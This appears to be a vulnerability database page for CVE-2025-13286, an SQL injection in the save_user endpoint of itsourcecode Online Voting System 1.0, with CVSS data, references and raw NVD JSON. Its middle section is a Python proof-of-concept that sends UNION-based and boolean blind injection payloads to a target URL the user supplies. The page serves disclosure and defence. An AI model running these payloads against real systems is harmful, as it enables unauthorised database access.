CVE-2025-13286

Description

A security flaw has been discovered in itsourcecode Online Voting System 1.0. The impacted element is an unknown function of the file /ajax.php?action=save_user. Performing manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:online_voting_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Online Voting System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13286 SQL Injection PoC
# Target: itsourcecode Online Voting System 1.0
# Endpoint: /ajax.php?action=save_user

target_url = input("Enter target URL (e.g., http://target.com): ").strip()

# SQL Injection payload - extract database version
payload = "1' UNION SELECT NULL,version(),user(),database(),NULL,NULL---"

# Prepare the request
endpoint = f"{target_url}/ajax.php?action=save_user"
data = {
    "id": payload,
    "username": "test",
    "password": "test123"
}

print(f"[*] Targeting: {endpoint}")
print(f"[*] Payload: {payload}")

try:
    response = requests.post(endpoint, data=data, timeout=10)
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Body:\n{response.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Boolean-based blind injection test
print("\n[*] Testing boolean-based blind injection...")
true_payload = "1' AND 1=1---"
false_payload = "1' AND 1=2---"

data_true = {"id": true_payload, "username": "test", "password": "test"}
data_false = {"id": false_payload, "username": "test", "password": "test"}

try:
    r_true = requests.post(endpoint, data=data_true, timeout=10)
    r_false = requests.post(endpoint, data=data_false, timeout=10)
    if r_true.status_code != r_false.status_code or r_true.text != r_false.text:
        print("[+] Blind SQL injection confirmed!")
    else:
        print("[-] Blind SQL injection test inconclusive")
except Exception as e:
    print(f"[-] Error during testing: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13286
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13286
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13286/
[4] VulDB https://vuldb.com/cve/CVE-2025-13286
[5] https://github.com/WANGshuyan2025/cve/issues/8
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.332626
[8] https://vuldb.com/?id.332626
[9] https://vuldb.com/?submit.690888

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13286", "sourceIdentifier": "[email protected]", "published": "2025-11-17T14:15:43.967", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in itsourcecode Online Voting System 1.0. The impacted element is an unknown function of the file /ajax.php?action=save_user. Performing manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:online_voting_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "89B24FA5-BBF1-4283-B2B2-8F1A365BD78C"}]}]}], "references": [{"url": "https://github.com/WANGshuyan2025/cve/issues/8", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.332626", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332626", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.690888", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}